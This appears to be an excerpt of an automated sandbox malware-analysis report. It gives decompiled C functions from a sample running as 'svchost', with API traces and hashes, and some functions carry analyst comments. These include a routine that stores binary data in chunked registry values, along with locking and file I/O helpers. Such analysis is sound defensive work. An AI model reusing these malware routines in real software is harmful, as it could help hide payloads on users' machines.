                                                                                							goto L16;
                                                                                						}
                                                                                						do {
                                                                                							L16:
                                                                                							_t30 =  *((intOrPtr*)(_t53 + 4));
                                                                                							_t51 =  *_t42;
                                                                                							__eflags = _t30 - 0xffffffff;
                                                                                							if(_t30 == 0xffffffff) {
                                                                                								L18:
                                                                                								_t20 = _t53 + 8; // 0x8
                                                                                								_t31 = _t20;
                                                                                								__eflags =  *_t31;
                                                                                								if( *_t31 == 0) {
                                                                                									L20:
                                                                                									_t52 = _t51 + 0xc;
                                                                                									__eflags = _t52;
                                                                                									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
                                                                                									goto L21;
                                                                                								}
                                                                                								_t21 = _t51 + 0x10; // 0x1320f8
                                                                                								_t34 = lstrcmpA(_t21, _t31);
                                                                                								__eflags = _t34;
                                                                                								if(_t34 != 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								goto L20;
                                                                                							}
                                                                                							__eflags =  *(_t51 + 0xc) - _t30;
                                                                                							if( *(_t51 + 0xc) != _t30) {
                                                                                								goto L21;
                                                                                							}
                                                                                							goto L18;
                                                                                							L21:
                                                                                							_t42 =  *_t42;
                                                                                							__eflags =  *_t42 - 0x1320e4;
                                                                                						} while ( *_t42 != 0x1320e4);
                                                                                						goto L22;
                                                                                					}
                                                                                					_t47 = 0;
                                                                                					goto L11;
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_t54 =  *_t41;
                                                                                					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
                                                                                						if(_a12 != 0) {
                                                                                							_t8 = _t54 + 8; // 0x74cb43e8
                                                                                							__eflags = lstrcmpA(_t8, _a12);
                                                                                						} else {
                                                                                							_t59 =  *(_t54 + 8);
                                                                                						}
                                                                                						if(_t59 == 0) {
                                                                                							break;
                                                                                						} else {
                                                                                							goto L7;
                                                                                						}
                                                                                					}
                                                                                					L7:
                                                                                					_t41 =  *_t41;
                                                                                					_t53 = 0;
                                                                                				} while ( *_t41 != 0x1320e8);
                                                                                				if(_t53 != 0) {
                                                                                					goto L15;
                                                                                				}
                                                                                				goto L9;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0012DD05: GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                  • Part of subcall function 0012DD05: InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                  • Part of subcall function 0012DD05: GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                • lstrcmpA.KERNEL32(74CB43E8,00000000,?,74CB43E0,00000000,?,00125EC1), ref: 0012E693
                                                                                • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,74CB43E0,00000000,?,00125EC1), ref: 0012E6E9
                                                                                • lstrcmpA.KERNEL32(89ABCDEF,00000008,?,74CB43E0,00000000,?,00125EC1), ref: 0012E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                • String ID: 89ABCDEF
                                                                                • API String ID: 3343386518-71641322
                                                                                • Opcode ID: c2d3995a4d4187ebc39b1b0c10a03a2cecc668ade1f8a8302c80bafee5cf5750
                                                                                • Instruction ID: 1994f91a5be9842ffaf554d00e94ce21feb3db0daf7ede1c542b2025e7279e02
                                                                                • Opcode Fuzzy Hash: c2d3995a4d4187ebc39b1b0c10a03a2cecc668ade1f8a8302c80bafee5cf5750
                                                                                • Instruction Fuzzy Hash: 4831CD31600B26DFCB35DF64F884BA677E4EB25320F10442AF45A87590E770ECA4CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			/* Stores the buffer _a16 (length _a20 bytes) under the registry key _a4\_a8 as a
                                                                                 			   series of REG_BINARY values named <_a12><index>, each at most 0xFF000 bytes long.
                                                                                 			   After the last chunk the value with the next index is deleted, so a shorter
                                                                                 			   re-write does not leave a stale trailing chunk behind.  Returns 1 when every
                                                                                 			   byte was stored, 0 otherwise.  Per the API trace below, _a4 is HKEY_CURRENT_USER. */
                                                                                 			E0012E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
                                                                                 				int _v8;            /* chunk index appended to the value name */
                                                                                 				char* _v12;         /* current read position in the data buffer */
                                                                                 				void* _v16;         /* handle of the opened/created registry key */
                                                                                 				char _v48;          /* value-name buffer: name prefix followed by the decimal index */
                                                                                 				intOrPtr* _t34;
                                                                                 				int _t50;           /* bytes still to be written */
                                                                                 				void* _t52;
                                                                                 				intOrPtr _t53;
                                                                                 				intOrPtr _t55;      /* prefix length, capped at 0x1c (decompiler left this undeclared) */
                                                                                 				int _t57;
                                                                                 				int _t58;           /* size of the current chunk */
                                                                                 				void* _t59;         /* frame pointer (decompiler artifact, used to address _v48) */
                                                                                 				void* _t60;         /* stack pointer (decompiler artifact) */
                                                                                 				void* _t61;
                                                                                 
                                                                                 				_t57 = 0;
                                                                                 				/* 0x20106 = KEY_WRITE | KEY_WOW64_64KEY: the 64-bit view of the hive is used */
                                                                                 				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
                                                                                 					return 0;
                                                                                 				}
                                                                                 				_v12 = _a16;
                                                                                 				/* inline strlen() of the value-name prefix _a12 */
                                                                                 				_t34 = _a12;
                                                                                 				_t52 = _t34 + 1;
                                                                                 				do {
                                                                                 					_t53 =  *_t34;
                                                                                 					_t34 = _t34 + 1;
                                                                                 				} while (_t53 != 0);
                                                                                 				_t55 = _t34 - _t52;
                                                                                 				_v8 = 0;
                                                                                 				/* cap the prefix so the index digits still fit into the name buffer */
                                                                                 				if(_t34 - _t52 > 0x1c) {
                                                                                 					_t55 = 0x1c;
                                                                                 				}
                                                                                 				E0012EE08( &_v48, _a12, _t55);      /* copies the (capped) prefix into _v48 */
                                                                                 				_t50 = _a20;
                                                                                 				_t61 = _t60 + 0xc;
                                                                                 				if(_t50 <= _t57) {
                                                                                 					L11:
                                                                                 					/* append the next index (radix 10) behind the prefix and delete that value:
                                                                                 					   it is the first value that is no longer part of the data just written */
                                                                                 					E0012F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                 					RegDeleteValueA(_v16,  &_v48);
                                                                                 					RegCloseKey(_v16);
                                                                                 					return 0 | _t50 == _t57;            /* 1 only if nothing is left unwritten */
                                                                                 				} else {
                                                                                 					while(1) {
                                                                                 						/* write at most 0xFF000 bytes per value */
                                                                                 						_t58 = 0xff000;
                                                                                 						if(_t50 < 0xff000) {
                                                                                 							_t58 = _t50;
                                                                                 						}
                                                                                 						/* value name = prefix + decimal chunk index */
                                                                                 						E0012F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                 						_t61 = _t61 + 0xc;
                                                                                 						/* type 3 = REG_BINARY */
                                                                                 						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
                                                                                 							break;                          /* leaves _t50 > 0, so the function returns 0 */
                                                                                 						}
                                                                                 						_v12 =  &(_v12[_t58]);
                                                                                 						_t50 = _t50 - _t58;
                                                                                 						_v8 = _v8 + 1;
                                                                                 						if(_t50 > 0) {
                                                                                 							continue;
                                                                                 						}
                                                                                 						break;
                                                                                 					}
                                                                                 					_t57 = 0;
                                                                                 					goto L11;
                                                                                 				}
                                                                                 			}
                                                                                 

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0012E2A3,00000000,00000000,00000000,00020106,00000000,0012E2A3,00000000,000000E4), ref: 0012E0B2
                                                                                • RegSetValueExA.ADVAPI32(0012E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,001322F8), ref: 0012E127
                                                                                • RegDeleteValueA.ADVAPI32(0012E2A3,?,?,?,?,?,000000C8,001322F8), ref: 0012E158
                                                                                • RegCloseKey.ADVAPI32(0012E2A3,?,?,?,?,000000C8,001322F8,?,?,?,?,?,?,?,?,0012E2A3), ref: 0012E161
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID:
                                                                                • API String ID: 2667537340-0
                                                                                • Opcode ID: 935502e51b859c4d37aafd650684d6ee8f6113dd8464ab4eb011d4da9fc18bd5
                                                                                • Instruction ID: b320e2dba82a4b210a458cc5572c4873b56c6abd0911966ad24ee9318827a445
                                                                                • Opcode Fuzzy Hash: 935502e51b859c4d37aafd650684d6ee8f6113dd8464ab4eb011d4da9fc18bd5
                                                                                • Instruction Fuzzy Hash: FA216F71A00229BBDF219FA4EC89EDE7FB9EF09790F004071F904E6151E7718A65DB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			/* Synchronous wrapper around an overlapped WriteFile on handle _a4: writes _a12
                                                                                 			   bytes from _a8, waits up to _a20 ms on the event _a16 if the I/O is still
                                                                                 			   pending, and returns 1 only if exactly _a12 bytes were transferred.
                                                                                 			   _a16 is reused as the bytes-transferred output once its event handle has
                                                                                 			   been saved in _t31. */
                                                                                 			E00123F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                 				struct _OVERLAPPED _v24;
                                                                                 				long _t30;          /* number of bytes requested */
                                                                                 				void* _t31;         /* event handle signalled when the I/O completes */
                                                                                 
                                                                                 				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                 				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                 				_t30 = _a12;
                                                                                 				_t31 = _a16;
                                                                                 				_a16 = _a16 & 0x00000000;
                                                                                 				_v24.hEvent = _t31;
                                                                                 				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                 					L3:
                                                                                 					/* a short write counts as failure */
                                                                                 					if(_t30 != _a16) {
                                                                                 						L5:
                                                                                 						return 0;
                                                                                 					}
                                                                                 					return 1;
                                                                                 				}
                                                                                 				/* 0x3e5 = ERROR_IO_PENDING: any other error is fatal */
                                                                                 				if(GetLastError() != 0x3e5) {
                                                                                 					goto L5;
                                                                                 				}
                                                                                 				WaitForSingleObject(_t31, _a20);
                                                                                 				/* bWait = 0: if the wait above timed out this fails with ERROR_IO_INCOMPLETE */
                                                                                 				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                 					goto L5;
                                                                                 				}
                                                                                 				goto L3;
                                                                                 			}
                                                                                 

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,0012A3C7,00000000,00000000,000007D0,00000001), ref: 00123F44
                                                                                • GetLastError.KERNEL32 ref: 00123F4E
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00123F5F
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00123F72
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 7a1557918111561d08bdd3bda1021a66b84e0ab1c7b16881292a894bb6166e2d
                                                                                • Instruction ID: 33fb5572028a8a11a5672fe3bd2280d9b535576790d1414823324f5e4c2cd9e6
                                                                                • Opcode Fuzzy Hash: 7a1557918111561d08bdd3bda1021a66b84e0ab1c7b16881292a894bb6166e2d
                                                                                • Instruction Fuzzy Hash: A8010C72911219ABDF06DF90EE84BEF7BBCEB08355F104015FA11E6050D734DA648BB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			/* Read-side twin of E00123F18: an overlapped ReadFile on handle _a4 into _a8
                                                                                 			   for _a12 bytes, waiting up to _a20 ms on the event _a16 if the I/O is still
                                                                                 			   pending.  Returns 1 only if exactly _a12 bytes were read. */
                                                                                 			E00123F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                 				struct _OVERLAPPED _v24;
                                                                                 				long _t30;          /* number of bytes requested */
                                                                                 				void* _t31;         /* event handle signalled when the I/O completes */
                                                                                 
                                                                                 				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                 				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                 				_t30 = _a12;
                                                                                 				_t31 = _a16;
                                                                                 				_a16 = _a16 & 0x00000000;    /* _a16 now receives the bytes-transferred count */
                                                                                 				_v24.hEvent = _t31;
                                                                                 				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                 					L3:
                                                                                 					/* a short read counts as failure */
                                                                                 					if(_t30 != _a16) {
                                                                                 						L5:
                                                                                 						return 0;
                                                                                 					}
                                                                                 					return 1;
                                                                                 				}
                                                                                 				/* 0x3e5 = ERROR_IO_PENDING: any other error is fatal */
                                                                                 				if(GetLastError() != 0x3e5) {
                                                                                 					goto L5;
                                                                                 				}
                                                                                 				WaitForSingleObject(_t31, _a20);
                                                                                 				/* bWait = 0: if the wait above timed out this fails with ERROR_IO_INCOMPLETE */
                                                                                 				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                 					goto L5;
                                                                                 				}
                                                                                 				goto L3;
                                                                                 			}
                                                                                 

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,0012A3C7,00000000,00000000,000007D0,00000001), ref: 00123FB8
                                                                                • GetLastError.KERNEL32 ref: 00123FC2
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00123FD3
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00123FE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 1c4d00930c3a6365c898a941c4bd518966762d8ad10029d391411f676bc204ad
                                                                                • Instruction ID: 2d3f2b71b855c61dd8f79a3aa0a338e38d89f9f90f0eba0c8e69497aba35d6b3
                                                                                • Opcode Fuzzy Hash: 1c4d00930c3a6365c898a941c4bd518966762d8ad10029d391411f676bc204ad
                                                                                • Instruction Fuzzy Hash: D001297291021AABDF01DF90EE85BEE3BBCEB08355F004011F902E2090D734DA648BB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00124E92(void* __ecx) {
                                                                                				long _t2;
                                                                                				void* _t7;
                                                                                				LONG* _t8;
                                                                                				long _t9;
                                                                                
                                                                                				_t7 = __ecx;
                                                                                				_t9 = GetTickCount();
                                                                                				_t8 = _t7 + 4;
                                                                                				while(1) {
                                                                                					_t2 = InterlockedExchange(_t8, 1);
                                                                                					if(_t2 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t2 = GetTickCount() - _t9;
                                                                                					if(_t2 < 0x2710) {
                                                                                						Sleep(0xa);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t2;
                                                                                			}

                                                                                Instruction addresses: 0x00124e9c, 0x00124ea6, 0x00124ea8, 0x00124ec0, 0x00124ec3, 0x00124ec7, 0x00000000, 0x00000000, 0x00124eaf, 0x00124eb6, 0x00124eba, 0x00000000, 0x00124eba, 0x00000000, 0x00124eb6, 0x00124ecd

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00124E9E
                                                                                • GetTickCount.KERNEL32 ref: 00124EAD
                                                                                • Sleep.KERNEL32(0000000A,?,00000001), ref: 00124EBA
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00124EC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 85fd910cd69b741f69aa8aced8bf1e4e9250ca72b900a595d47e54783b26d4db
                                                                                • Instruction ID: 5c938f4610270d3b1dab19d046c77267da84d03ef9896388130580eba4cf6392
                                                                                • Opcode Fuzzy Hash: 85fd910cd69b741f69aa8aced8bf1e4e9250ca72b900a595d47e54783b26d4db
                                                                                • Instruction Fuzzy Hash: C3E0863220122457E61427B9FD84F6A6689AB593A1F020531F609D2550C75AD89246B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012A4C7(intOrPtr _a4) {
                                                                                				long _t3;
                                                                                				LONG* _t8;
                                                                                				long _t9;
                                                                                
                                                                                				_t9 = GetTickCount();
                                                                                				_t8 = _a4 + 0x5c;
                                                                                				while(1) {
                                                                                					_t3 = InterlockedExchange(_t8, 1);
                                                                                					if(_t3 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t3 = GetTickCount() - _t9;
                                                                                					if(_t3 < 0x1388) {
                                                                                						Sleep(0);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t3;
                                                                                			}

                                                                                Instruction addresses: 0x0012a4dd, 0x0012a4df, 0x0012a4f7, 0x0012a4fa, 0x0012a4fe, 0x00000000, 0x00000000, 0x0012a4e6, 0x0012a4ed, 0x0012a4f1, 0x00000000, 0x0012a4f1, 0x00000000, 0x0012a4ed, 0x0012a504

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0012A4D1
                                                                                • GetTickCount.KERNEL32 ref: 0012A4E4
                                                                                • Sleep.KERNEL32(00000000,?,0012C2E9,0012C4E0,00000000,localcfg,?,0012C4E0,00133588,00128810), ref: 0012A4F1
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 0012A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 6856055e58dc8dc96e232fed6b081be5a91e66b63da94df9e892181e7032db71
                                                                                • Instruction ID: 963a2bb6db76da67b7a75dbcd2712c58ae26df2d0ceadbaa907925422fa51f9a
                                                                                • Opcode Fuzzy Hash: 6856055e58dc8dc96e232fed6b081be5a91e66b63da94df9e892181e7032db71
                                                                                • Instruction Fuzzy Hash: 1FE0263320022457C6002BA5BD84F6A33C8AF4D7A1F460021FB04D3540C756E89141B3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00124BD1(void* __ecx) {
                                                                                				long _t2;
                                                                                				void* _t7;
                                                                                				LONG* _t8;
                                                                                				long _t9;
                                                                                
                                                                                				_t7 = __ecx;
                                                                                				_t9 = GetTickCount();
                                                                                				_t8 = _t7 + 0xc;
                                                                                				while(1) {
                                                                                					_t2 = InterlockedExchange(_t8, 1);
                                                                                					if(_t2 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t2 = GetTickCount() - _t9;
                                                                                					if(_t2 < 0x1388) {
                                                                                						Sleep(0);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t2;
                                                                                			}

                                                                                Instruction addresses: 0x00124bdb, 0x00124be5, 0x00124be7, 0x00124bff, 0x00124c02, 0x00124c06, 0x00000000, 0x00000000, 0x00124bee, 0x00124bf5, 0x00124bf9, 0x00000000, 0x00124bf9, 0x00000000, 0x00124bf5, 0x00124c0c

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00124BDD
                                                                                • GetTickCount.KERNEL32 ref: 00124BEC
                                                                                • Sleep.KERNEL32(00000000,?,?,?,006182F4,001250F2), ref: 00124BF9
                                                                                • InterlockedExchange.KERNEL32(006182E8,00000001), ref: 00124C02
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 32e5862561dbca93baa1f8f500798c62b07d700333f748e3798907f93908ed9a
                                                                                • Instruction ID: 06b350c4913c48e92efad452c656ab527d3d861cce9d786b995fb8f541f56991
                                                                                • Opcode Fuzzy Hash: 32e5862561dbca93baa1f8f500798c62b07d700333f748e3798907f93908ed9a
                                                                                • Instruction Fuzzy Hash: 8EE07D3330122417C71017B97C80F6673DCDB4D3A2F030032F708C2550C752D49041B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E001230FA(LONG* _a4) {
                                                                                				long _t3;
                                                                                				long _t5;
                                                                                
                                                                                				_t5 = GetTickCount();
                                                                                				while(1) {
                                                                                					_t3 = InterlockedExchange(_a4, 1);
                                                                                					if(_t3 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t3 = GetTickCount() - _t5;
                                                                                					if(_t3 < 0x1388) {
                                                                                						Sleep(0);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t3;
                                                                                			}

                                                                                Instruction addresses: 0x0012310b, 0x00123122, 0x00123128, 0x0012312c, 0x00000000, 0x00000000, 0x00123111, 0x00123118, 0x0012311c, 0x00000000, 0x0012311c, 0x00000000, 0x00123118, 0x00123131

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00123103
                                                                                • GetTickCount.KERNEL32 ref: 0012310F
                                                                                • Sleep.KERNEL32(00000000), ref: 0012311C
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00123128
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 98cae5698b557ac877357ea5f64a07af7cacfc8392c608e81819099900f5800b
                                                                                • Instruction ID: 2a11c96f5fc2253b4e32394d02783a0d9e5819c84f57c34ce90920f0db4fe928
                                                                                • Opcode Fuzzy Hash: 98cae5698b557ac877357ea5f64a07af7cacfc8392c608e81819099900f5800b
                                                                                • Instruction Fuzzy Hash: 59E02B31300335AFDB042B75BD54B59ABDADF887E1F010031F601D24B0C7548DB08971
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E00128CEE() {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				long _t15;
                                                                                				char _t17;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr* _t20;
                                                                                				void* _t25;
                                                                                				signed int _t31;
                                                                                				signed char _t35;
                                                                                				signed int _t36;
                                                                                				char* _t41;
                                                                                				intOrPtr* _t42;
                                                                                				signed int _t45;
                                                                                				void* _t49;
                                                                                
                                                                                				_push(_t34);
                                                                                				_t31 = 0;
                                                                                				_t49 =  *0x133380 - _t31; // 0x0
                                                                                				if(_t49 == 0) {
                                                                                					L17:
                                                                                					return _t15;
                                                                                				}
                                                                                				_t15 = GetTickCount() -  *0x133388;
                                                                                				if(_t15 < 0xea60) {
                                                                                					goto L17;
                                                                                				}
                                                                                				_t41 =  *0x133380; // 0x0
                                                                                				_t17 =  *_t41;
                                                                                				_t45 =  *(_t41 + 1);
                                                                                				_t42 = _t41 + 5;
                                                                                				_v12 = _t17;
                                                                                				if(_t17 <= 0) {
                                                                                					L16:
                                                                                					_t15 = GetTickCount();
                                                                                					 *0x133388 = _t15;
                                                                                					goto L17;
                                                                                				} else {
                                                                                					_v8 = _t42;
                                                                                					do {
                                                                                						_t35 =  *_v8;
                                                                                						if(_t35 != 8) {
                                                                                							if(_t35 != 9) {
                                                                                								_t36 = _t35;
                                                                                								_t19 =  *((intOrPtr*)(0x133300 + _t36 * 4));
                                                                                								if(_t19 == 0) {
                                                                                									goto L12;
                                                                                								}
                                                                                								_t9 = _t19 + 0x34; // 0x3b10c483
                                                                                								if(_t36 ==  *_t9) {
                                                                                									_t13 = _t19 + 0x50; // 0x7486850
                                                                                									_t20 =  *_t13;
                                                                                									if(_t20 != 0) {
                                                                                										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
                                                                                									}
                                                                                									goto L16;
                                                                                								}
                                                                                								goto L12;
                                                                                							}
                                                                                							_t25 = E0012A688(_t45 >> _t35 & 0x00000001);
                                                                                							L8:
                                                                                							if(_t25 != 0) {
                                                                                								_t6 = _v8 + 1; // 0x3cc6
                                                                                								_t45 = _t45 |  *_t6;
                                                                                							}
                                                                                							goto L12;
                                                                                						}
                                                                                						_t25 = E0012A677(_t45 >> _t35 & 0x00000001);
                                                                                						goto L8;
                                                                                						L12:
                                                                                						_v8 = _v8 + 5;
                                                                                						_t31 = _t31 + 1;
                                                                                					} while (_t31 < _v12);
                                                                                					goto L16;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 536389180-1857712256
                                                                                • Opcode ID: be078fdaa200f04db3313f08781bfd02ecb7eadbf723794c54d8ef97f3b3b451
                                                                                • Instruction ID: 54decdfac89342f7c1e7d3e15b6e983e5cc2984d1384e263d4eb212986a5c511
                                                                                • Opcode Fuzzy Hash: be078fdaa200f04db3313f08781bfd02ecb7eadbf723794c54d8ef97f3b3b451
                                                                                • Instruction Fuzzy Hash: 94212432612229AFCB149FF8EC916AABBB9FF20340B290059E401DB591CF34ED98C714
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0012C057
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTickwsprintf
                                                                                • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                • API String ID: 2424974917-1012700906
                                                                                • Opcode ID: 5909c8924a8bfca3740f4f3e4961981c92bd0cac9c53a6cf368d62a837d33120
                                                                                • Instruction ID: 2f63733c9237e9a864f69ad15f0d605cadb13ffa3bdc9253e0b71f37f206b93c
                                                                                • Opcode Fuzzy Hash: 5909c8924a8bfca3740f4f3e4961981c92bd0cac9c53a6cf368d62a837d33120
                                                                                • Instruction Fuzzy Hash: 21118672100100EFDB429BA9CD44E567FA6FB8C318B34819CF6188A166D633D863EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 001226C3
                                                                                • inet_ntoa.WS2_32(?), ref: 001226E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbyaddrinet_ntoa
                                                                                • String ID: localcfg
                                                                                • API String ID: 2112563974-1857712256
